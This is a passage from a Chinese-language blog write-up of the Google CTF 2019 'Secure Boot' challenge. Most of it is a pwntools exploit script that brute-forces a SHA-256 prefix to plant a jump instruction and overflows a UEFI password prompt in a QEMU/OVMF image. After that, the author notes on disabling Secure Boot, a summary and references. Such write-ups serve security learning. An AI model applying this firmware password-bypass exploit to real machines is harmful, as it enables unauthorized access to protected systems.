class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> tempfile</span><br><span class="line"></span><br><span class="line">target = <span class="number">0x67db07b</span></span><br><span class="line"></span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>) <span class="comment">#,log_level=&#x27;debug&#x27;)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">find_sha</span>(<span class="params">myasm</span>):</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">1000000</span>):</span><br><span class="line">        payload = <span class="built_in">str</span>(i)</span><br><span class="line">        payload = payload.ljust(<span class="number">128</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">        payload += <span class="string">&#x27;\x00&#x27;</span> * <span class="number">8</span></span><br><span class="line">        payload += p32(target)</span><br><span class="line">        <span class="keyword">if</span> binascii.unhexlify(hashlib.sha256(payload).hexdigest())[<span class="number">0</span>:<span class="built_in">len</span>(myasm)] == myasm:</span><br><span class="line">            print(<span class="string">&#x27;[1] payload: &#x27;</span>, payload)</span><br><span class="line">            print(hashlib.sha256(payload).hexdigest())</span><br><span class="line">            payload = <span class="built_in">str</span>(i)</span><br><span class="line">            payload = payload.ljust(<span class="number">136</span>, <span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">            payload += p32(target)</span><br><span class="line">            print(<span class="string">&#x27;[2] payload: &#x27;</span>, payload)</span><br><span class="line">            print(hashlib.sha256(payload).hexdigest())</span><br><span class="line">            <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exploit</span>(<span class="params">p</span>):</span></span><br><span class="line">    p.sendafter(<span class="string">&#x27;2J&#x27;</span>,<span class="string">&quot;\x1b\x5b\x32\x34\x7e&quot;</span>*<span class="number">10</span>)</span><br><span class="line">    payload = find_sha(asm(<span class="string">&quot;jmp $-0x17&quot;</span>))</span><br><span class="line">    payload += <span class="string">&quot;\r&quot;</span></span><br><span class="line">    </span><br><span class="line">    p.sendafter(<span class="string">&quot;Password?&quot;</span>, payload)</span><br><span class="line">    p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">local</span>():</span></span><br><span class="line">    fname = tempfile.NamedTemporaryFile().name</span><br><span class="line">    os.system(<span class="string">&quot;cp OVMF.fd %s&quot;</span> % (fname))</span><br><span class="line">    os.system(<span class="string">&quot;chmod u+w %s&quot;</span> % (fname))</span><br><span class="line"></span><br><span class="line">    <span class="comment"># os.system(&quot;qemu-system-x86_64 -s -monitor /dev/null -m 128M -drive if=pflash,format=raw,file=%s -drive file=fat:rw:contents,format=raw -net none -nographic 2&gt; /dev/null&quot; % (fname))</span></span><br><span class="line">    p = process([<span class="string">&#x27;qemu-system-x86_64&#x27;</span>,<span class="string">&#x27;-s&#x27;</span>,<span class="string">&#x27;-m&#x27;</span>,<span class="string">&#x27;128M&#x27;</span>,<span class="string">&#x27;-drive&#x27;</span>,<span class="string">&#x27;if=pflash,format=raw,file=&#x27;</span>+fname,<span class="string">&#x27;-drive&#x27;</span>,<span class="string">&#x27;file=fat:rw:contents,format=raw&#x27;</span>,<span class="string">&#x27;-net&#x27;</span>,<span class="string">&#x27;none&#x27;</span>,<span class="string">&#x27;-nographic&#x27;</span>], env=&#123;&#125;)</span><br><span class="line">    exploit(p)</span><br><span class="line">    os.system(<span class="string">&quot;rm -rf %s&quot;</span> % (fname))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="comment"># p = remote(&quot;secureboot.ctfcompetition.com&quot;, 1337)</span></span><br><span class="line">    local()</span><br></pre></td></tr></table></figure>
<p>直接用 pwntools 的输出的话很坑，但是题目中也提供了一种输出方式。</p>
<p>本地调试：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat -,raw,<span class="built_in">echo</span>=0 SYSTEM:<span class="string">&quot;python ./payload.py&quot;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/40m41h42t/Images/master/2019/07/secboot-4.png"></p>
<p>可以看到，它提供了一个不错的界面。我们进入 Device Manager，进入 Secure Boot Configuration，关闭 Attempt Secure Boot，保存退出即可。</p>
<p>最终即可得到 flag：</p>
<p><img src="https://raw.githubusercontent.com/40m41h42t/Images/master/2019/07/secboot-5.png"></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>虽然看上去有点麻烦，但是仔细分析的话它的漏洞其实很容易利用。。不过我好菜啊，看了两天。。最后还把虚拟机搞崩了，但是 WSL 还能用，太舒服了。。</p>
<h1 id="工具收集"><a href="#工具收集" class="headerlink" title="工具收集"></a>工具收集</h1><p><a target="_blank" rel="noopener" href="https://github.com/theopolis/uefi-firmware-parser">UEFI Firmware Parser</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/LongSoft/UEFITool">UEFITool</a></p>
<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><p><a target="_blank" rel="noopener" href="https://devcraft.io/2019/06/25/secure-boot-google-ctf-2019-quals.html">Secure Boot - Google CTF 2019 Quals</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/EmpireCTF/empirectf/tree/master/writeups/2019-06-22-Google-CTF-Quals">2019-06-22-Google-CTF-Quals</a></p>
<p><a target="_blank" rel="noopener" href="https://wiki.osdev.org/UEFI">UEFI</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/tianocore/tianocore.github.io/wiki/OVMF">OVMF</a></p>
<p><a target="_blank" rel="noopener" href="https://dox.ipxe.org/efi__console_8c_source.html#l00279">efi__console_8c_source</a></p>
<p><a target="_blank" rel="noopener" href="https://invisible-island.net/xterm/ctlseqs/ctlseqs.html">XTerm Control Sequences</a></p>
<p><a target="_blank" rel="noopener" href="https://notes.burke.libbey.me/ansi-escape-codes/">Everything you never wanted to know about ANSI escape codes</a></p>
<p><a target="_blank" rel="noopener" href="https://wintersun.space/2016/06/08/%E3%80%90pwn%E3%80%91%E8%AF%A1%E5%BC%82%E7%9A%84movsx%E5%92%8Ccdqe/">【pwn】诡异的movsx和cdqe</a></p>

      </div>
      <div class="post-copyright">
    <p class="copyright-item">
      <span>Author: </span>
      <a href="http://www.qrzbing.cn/blog">qrzbing</a>
    </p>
    <p class="copyright-item">
      <span>Link: </span>
      <a href="http://www.qrzbing.cn/blog/2019/07/22/googlectf2019-secureboot/">http://www.qrzbing.cn/blog/2019/07/22/googlectf2019-secureboot/</a>
    </p>
    <p class="copyright-item">
      <span>License: </span><a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank">知识共享署名-非商业性使用 4.0 国际许可协议</a>
    </p>
  </div>
      <footer class="post-footer">
        <div class="post-tags">
            <a href="/blog/tags/pwn/">pwn</a>
            </div>
        
        <nav class="post-nav"><a class="prev" href="/blog/2019/08/25/learning-parser-combinators-with-rust-4/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">【译】通过 Rust 学习解析器组合器 — 第四部分</span>
        <span class="prev-text nav-mobile">Prev</span>
      </a>
    <a class="next" href="/blog/2019/07/19/how2heap-5/">
        <span class="next-text nav-default">how2heap-5</span>
        <span class="prev-text nav-mobile">Next</span>
        <i class="iconfont icon-right"></i>
      </a>
    </nav></footer>
    </article></div><div class="comments" id="comments"></div></div>
      </main>

      <footer id="footer" class="footer"><div class="social-links"><a href="mailto:qrzbing#gmail.com" class="iconfont icon-email" title="email"></a>
        <a target="_blank" rel="noopener" href="https://github.com/qrzbing" class="iconfont icon-github" title="github"></a>
        <a href="/blog/atom.xml" class="iconfont icon-rss" title="rss"></a>
    </div><div class="copyright">
  <span class="power-by">
    Powered by <a class="hexo-link" target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    Theme - 
    <a class="theme-link" target="_blank" rel="noopener" href="https://github.com/ahonn/hexo-theme-even">Even</a>
  </span>

  <span class="copyright-year">&copy;2015 - 2021<span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">qrzbing</span>
  </span>
</div>
</footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div><script type="text/javascript" src="/blog/lib/jquery/jquery.min.js"></script>
  <script type="text/javascript" src="/blog/lib/slideout/slideout.js"></script>
  <script type="text/javascript" src="/blog/lib/fancybox/jquery.fancybox.pack.js"></script>
  <script type="text/javascript" src="/blog/js/src/even.js?v=2.11.0"></script>
</body>
</html>
